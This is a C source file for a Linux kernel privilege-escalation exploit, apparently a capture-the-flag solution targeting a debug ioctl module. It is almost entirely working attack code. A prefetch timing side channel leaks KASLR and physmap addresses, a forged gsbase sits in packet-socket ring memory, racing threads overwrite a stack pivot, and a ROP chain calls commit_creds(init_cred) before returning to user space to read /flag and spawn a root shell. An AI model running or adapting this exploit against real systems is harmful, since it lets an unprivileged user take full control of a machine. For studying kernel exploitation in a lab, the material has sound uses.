#define _GNU_SOURCE
#include <sys/resource.h>
#include <sys/sendfile.h>
#include <sys/ioctl.h>
#include <x86intrin.h>
#include <inttypes.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#include <sched.h>
#include <math.h>

#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>

#include <arpa/inet.h>
#include <netinet/if_ether.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>

#include <linux/if_packet.h>

#define PFN_MIN 0
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)

typedef uint64_t u64;
typedef uint32_t u32;
typedef uint16_t u16;
typedef uint8_t u8;

typedef int64_t i64;
typedef int32_t i32;
typedef int16_t i16;
typedef int8_t i8;

u64 kaslr_slide = 0;
u64 physmap_base = 0;

// mmap on a socket allows us to get a massive amount of consecutive physical memory
// that we can point our forged gsbase at
char *map_pg_vec() {
    struct tpacket_req tp;
    char *ring;

    int fd = socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_IP));

    tp.tp_block_size = 128 * 0x1000;
    tp.tp_block_nr = 1;
    tp.tp_frame_size = 0x1000;
    tp.tp_frame_nr = 128;
    setsockopt(fd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));

    ring = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ|PROT_WRITE,
                MAP_SHARED|MAP_POPULATE, fd, 0);
	memset(ring, 'A', tp.tp_block_size * tp.tp_block_nr);
    return ring;
}


u64 virt_to_physmap(u64 virt_addr, u64 page_offset_base)
{
    u64 pfn = 0;
    u64 kaddr = 0;
    u64 value = 0;
    u64 present = 0;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if(fd < 0) {
		puts("[virt_to_physmap] fail to open /proc/self/pagemap");
		exit(-1);
	}

    // read the pagemap info about the input virtual address
    lseek(fd, (virt_addr >> PAGE_SHIFT)*sizeof(u64), SEEK_SET);
    read(fd, &value, sizeof(u64));
    // printf("pagemap: %#llx\n", value);

    // parse the value
    pfn = value & ((1UL << 55) - 1);
    present = value & (1UL << 63);
    if(present && pfn) { // if page exists and page frame exists
        kaddr = page_offset_base + PAGE_SIZE * (pfn-PFN_MIN);
    }

    close(fd);
    return kaddr;
}

void pin_cpu(int cpu)
{
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpu, &my_set);
    sched_setaffinity(0, sizeof(my_set), &my_set);
}

// Control flow returns here
void from_kernel() {
    int uid = getuid();
    printf("[from_kernel]: current uid = %d\n", uid);

    char flag[0x20] = {0};
    int flag_fd = open("/flag", O_RDONLY);
    read(flag_fd, flag, sizeof(flag));
    printf("[from_kernel]: got flag = %s\n", flag);
	system("/bin/sh");

    while (1) {}
}

u64 probe_entry(u64 addr)
{
      uint64_t a, b, c, d;
      asm volatile (".intel_syntax noprefix;"
        "cpuid;"    // serialization
                    //
        "mov rax, 104;"
        "syscall;"  // invoke a system call to load entry_SYSCALL_64 into the cache
        "mov rax, 104;"
        "syscall;"  // invoke a system call to load entry_SYSCALL_64 into the cache
        "mov rax, 104;"
        "syscall;"  // invoke a system call to load entry_SYSCALL_64 into the cache
        //"cpuid;"  // serialization, making sure it is actually loaded

        "rdtscp;"
        "mov r12, rax;"
        "mov r13, rdx;" // record the start timestamp into temporary registers to avoid cache miss

        "prefetcht0 qword ptr [%4];"
        "prefetcht0 qword ptr [%4];"
        "prefetcht0 qword ptr [%4];"
        "mfence;"   // do the prefetch

        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;" // save the end timestamp

        "mov %0, r12;"
        "mov %1, r13;" // save the start timestamp

        "mfence;" // make sure everything is saved correctly
        ".att_syntax;"
        : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx", "r12", "r13");
    a = (b << 32) | a;
    c = (d << 32) | c;
    return c - a;
}

#define MIN_KERNEL_BASE 0xffffffff80000000ULL
#define MAX_KERNEL_BASE 0xffffffffc0000000ULL
#define KERNEL_ALIGN 0x200000ULL
char a[0x1000000];
u64 entrybleed_get_kaslr_slide_nopti()
{
    int len = (MAX_KERNEL_BASE-MIN_KERNEL_BASE-0x1000000)/KERNEL_ALIGN;
    u64 *times = malloc(sizeof(u64)*len);
    for(int i=0; i<len; i++) {
        u64 probe_addr = MIN_KERNEL_BASE + i*KERNEL_ALIGN + 0x1000000;
        u64 elapsed, sum=0;
        memset(a, 'A', sizeof(a)); // flush cache
        for(int j=0; j<1000; j++) {
            sum += probe_entry(probe_addr);
        }
        elapsed = sum;
        //printf("addr: %#llx, probe: %#llx, elapsed: %#llx\n", 0, probe_addr, elapsed);
        times[i] = elapsed;
    }

    // calculate the mean
    u64 total = 0;
    for(int i=0; i<len; i++) {
        total += times[i];
    }
    double mean = total/len;

    // calculate the std
    double tmp = 0;
    for(int i=0; i<len; i++) {
        tmp += ((double)times[i]-mean)*((double)times[i]-mean);
    }
    tmp /= len;
    double std = sqrt(tmp);

    u64 bar = (u64)(mean-std);
    //printf("bar: %#llx\n", bar);
    for(int i=0; i<len; i++) {
        if(times[i] < bar) {
            free(times);
            return i*KERNEL_ALIGN;
        }
    }
    puts("fail to leak kaslr_slide");
	exit(-1);
}

#define MIN_PHYSMAP_BASE 0xffff888000000000ULL
#define MAX_PHYSMAP_BASE 0xffffc88000000000ULL
#define PHYSMAP_ALIGN 0x40000000ULL // 1G
u64 entrybleed_get_physmap_base(u64 gsbase_offset)
{
    int len = (MAX_PHYSMAP_BASE-MIN_PHYSMAP_BASE)/PHYSMAP_ALIGN;
    u64 *times = malloc(sizeof(u64)*len);
    //for(u64 addr=MIN_PHYSMAP_BASE; addr<MAX_PHYSMAP_BASE; addr+=PHYSMAP_ALIGN) {
    for(int i=0; i<len; i++) {
        u64 elapsed, sum=0;
        u64 addr = MIN_PHYSMAP_BASE+i*PHYSMAP_ALIGN;
        //u64 probe_addr = addr+kaslr_slide+0x20f58ULL;
        u64 probe_addr = addr+gsbase_offset;
        for(int j=0; j<10; j++) {
            sum += probe_entry(probe_addr);
        }
        elapsed = sum;
        //printf("addr: %#llx, probe: %#llx, elapsed: %#llx, i: %d\n", addr, probe_addr, elapsed, i);
        times[i] = elapsed;
    }
    u64 min = ~0;
    int idx = -1;
    for(int i=0; i<len; i++) {
        if(times[i] < min) {
            idx = i;
            min = times[i];
        }
    }
    free(times);
    return MIN_PHYSMAP_BASE + idx*PHYSMAP_ALIGN;
}

void orw_thread(int cpu, void *pg_vec, void *physmap_pg_vec, u64 kaslr_base) {
    u64 pop_rsp_ret = kaslr_slide + 0xffffffff81e2455d;
    if (!fork()) {
        pin_cpu(cpu);
        volatile u64 *stack_orw_target = pg_vec + 0x1dd8;

        u64 *full_chain_phys = physmap_pg_vec + 0x30100;

        while (1) {
            stack_orw_target[0] = pop_rsp_ret;
            stack_orw_target[1] = (u64)full_chain_phys;
        }
    }
}

void drop_priv()
{
    if (getuid() == 0 || getgid() == 0) {
        /* process is running as root, drop privileges */
        if (setgid(1000) != 0) {
            perror("setgid: Unable to drop group privileges:");
            exit(1);
        }
        if (setuid(1000) != 0) {
            perror("setuid: Unable to drop user privileges:");
            exit(1);
        }
    }

    if (setuid(0) != -1) {
        printf("ERROR: Managed to regain root privileges?");
        exit(1);
    }

    printf("Dropped privileges!\n");
    printf("Current privileges: %d\n", getuid());

    if (chmod("/flag", 00666) == -1) {
        printf("DEBUG: could not chmod /flag!\n");
    } else {
        printf("ERROR: was able to chmod /flag!\n");
        exit(1);
    }
}

void handler(int sig)
{
	puts("handler");
	printf("uid: %d\n", getuid());
	system("/bin/sh");
}


int main(int argc, char **argv) {
    struct arb_read_req {
        u64 *src;
        u64 *dst;
    } req;
    void *physbase = 0;
    void *gsbase = 0;

	signal(SIGSEGV, handler);

    pin_cpu(15);

    //kaslr_slide = entrybleed_get_kaslr_slide_nopti();
    kaslr_slide = 0;
    u64 kaslr_base = 0xffffffff81000000 + kaslr_slide;
	printf("kaslr_base: %#llx\n", kaslr_base);
    //physmap_base = entrybleed_get_physmap_base(0x17f80000);
	physbase = (void *)0xffff888000000000;
	printf("physmap_base: %#llx\n", physmap_base);

    u32 dbg = open("/proc/dbg-mod", 2);

    // Allocate memory aread for forged gsbase
    void *pg_vec = map_pg_vec();

    // Need to find our pg_vec in physmap
    //void *physmap_pg_vec = physbase + virt2phys(pg_vec) + 0x10000000;
    void *physmap_pg_vec = virt_to_physmap(pg_vec, physbase);
    printf("phys pg_vec: %p\n", physmap_pg_vec);

	drop_priv();

	for(int i=0; i<15; i++) {
		orw_thread(i, pg_vec, physmap_pg_vec, kaslr_base);
	}

    // target code:
    /*
    0xffffffff82200040 <entry_SYSCALL_64>:	    swapgs
    0xffffffff82200043 <entry_SYSCALL_64+3>:	mov    QWORD PTR gs:0x6014,rsp
    0xffffffff8220004c <entry_SYSCALL_64+12>:	jmp    0xffffffff82200060 <entry_SYSCALL_64+32>
    0xffffffff8220004e <entry_SYSCALL_64+14>:	mov    rsp,cr3
    0xffffffff82200051 <entry_SYSCALL_64+17>:	nop    DWORD PTR [rax+rax*1+0x0]
    0xffffffff82200056 <entry_SYSCALL_64+22>:	and    rsp,0xffffffffffffe7ff
    0xffffffff8220005d <entry_SYSCALL_64+29>:	mov    cr3,rsp
    0xffffffff82200060 <entry_SYSCALL_64+32>:	mov    rsp,QWORD PTR gs:0x32898
    */

    // Our new rsp will come from this offset of our swapped in gsbase
    u64 gs_pivot_offset = 0x33958;
    u64 gs_stack_addr = (u64)(physmap_pg_vec + 0x2000);

    *(u64 *)(pg_vec + gs_pivot_offset) = gs_stack_addr;

    // without creating a forged task struct we would page fault here in do_SYSCALL_64
    /*
    0xffffffff83ec25c7 <+87>:	mov    rax,QWORD PTR gs:0x30000
    0xffffffff83ec25d0 <+96>:	mov    rax,QWORD PTR [rax+0x20]
    */
    u64 kstack_offset = 0x1a000; // kstack_offset
    void *kstack = pg_vec + 0x8000;

    u64 task_offset = 0x33940; // pcpu_hot
    void *usr_task_addr = pg_vec + 0x4000;
    u64 forged_task_addr = (u64)(physmap_pg_vec + 0x4000);
    *(u64 *)(pg_vec+task_offset) = forged_task_addr;

    // forge syscall_work
    void *task_stack_addr = (pg_vec + 0x4000) + 0x8;
    *(u64 *)task_stack_addr = 0;




    // We need to mimic the preempt_count of a normal syscall: 0x80000000
    /*
    0xffffffff83ec8202 <lockdep_hardirqs_off+18> mov    eax, DWORD PTR gs:[rip+0x7c167dff]        # 0x30008 <pcpu_hot+8>
    0xffffffff83ec8209 <lockdep_hardirqs_off+25> test   eax, 0xf00000
    */
    void *percpu_preempt_count = pg_vec + 0x30008;
    *(u64 *)percpu_preempt_count = 0x80000000;

    // might need to mimic normal hardirqs_enabled value: 0x1
    /*
    0xffffffff83ec821f <lockdep_hardirqs_off+47> mov    eax, DWORD PTR gs:[rip+0x7c154676]        # 0x1c89c <hardirqs_enabled>
    0xffffffff83ec8226 <lockdep_hardirqs_off+54> test   eax, eax
    */
    //*(u8 *)(pg_vec + 0x1c89c) = 1;

    // thought this neeed to be 0x4 but I guess not
    /*
    0xffffffff83ec9a15 <check_preemption_disabled+53> mov    rax, QWORD PTR gs:0x30000
    0xffffffff83ec9a1e <check_preemption_disabled+62> test   BYTE PTR [rax+0x2f], 0x4
    */
    *(u8 *)(usr_task_addr + 0x2f) = 0x0;

    /* make migration_disabled true
    0xffffffff83ec9a2b <+75>:	mov    rbx,QWORD PTR gs:0x30000
    0xffffffff83ec9a34 <+84>:	cmp    WORD PTR [rbx+0x438],0x0
    0xffffffff83ec9a3c <+92>:	jne    0xffffffff83ec99fe <check_preemption_disabled+30>
    */
    *(u64 *)(usr_task_addr + 0x830) = 1;

    // Store our malicious gsbase address in userspace's gsbase
	asm volatile("wrgsbase %0" :: "r" (physmap_pg_vec) : "memory");

    // we want this for later
    u64 saved_rsp;
    asm(".intel_syntax noprefix;"
        "mov %0, rsp;"
        ".att_syntax prefix;"
        : "=r"(saved_rsp)
    );
    // ensure rsp is aligned for later
    saved_rsp |= 0x8;

    u64 cli_ret =      kaslr_slide + 0xffffffff821651b5;
    u64 sti_ret =      kaslr_slide + 0xffffffff820b70e1; // : sti; ret;
    u64 swapgs_ret =   kaslr_slide + 0xffffffff8216308d; //: swapgs; pop rbp; jmp 0xffffffff821834e0 <__x86_return_thunk>;
    u64 pop_rdi_ret =  kaslr_slide + 0xffffffff81fd524d; //: pop rdi; ret;
    u64 init_cred =    kaslr_slide + 0xffffffff8327c098;
    u64 commit_creds = kaslr_slide + 0xffffffff8113d240;
    u64 pop_rcx_ret =  kaslr_slide + 0xffffffff8165016d; // : pop rcx; ret;
    u64 iretq =        kaslr_slide + 0xffffffff822022c0; //: iretq;
    u64 user_rip_target = (u64)from_kernel;

    u64 *full_chain_usr = pg_vec + 0x30100;
    full_chain_usr[0] = cli_ret; // once swapgs executes we don't care anyways
    full_chain_usr[1] = swapgs_ret;
    full_chain_usr[2] = 0;
    full_chain_usr[3] = pop_rdi_ret;
    full_chain_usr[4] = init_cred;
    full_chain_usr[5] = commit_creds;
    full_chain_usr[6] = swapgs_ret;
    full_chain_usr[7] = saved_rsp; // rbp
    full_chain_usr[8] = iretq;
    full_chain_usr[9] = user_rip_target;
    full_chain_usr[10] = 0x33;  // cs
    full_chain_usr[11] = 0x246; // eflags
    full_chain_usr[12] = saved_rsp;
    full_chain_usr[13] = 0x2b;  // ss

    printf("Triggering gadget...\n");

    sleep(1);

    // Trigger a hijacked call with the entry_SYSCALL_64 gadget
    u64 entry_SYSCALL_64 = kaslr_slide + 0xffffffff82200080 + 0x10;
    ioctl(dbg, 1339, entry_SYSCALL_64);

    // Control flow continues in from_kernel()

    return 0;
}

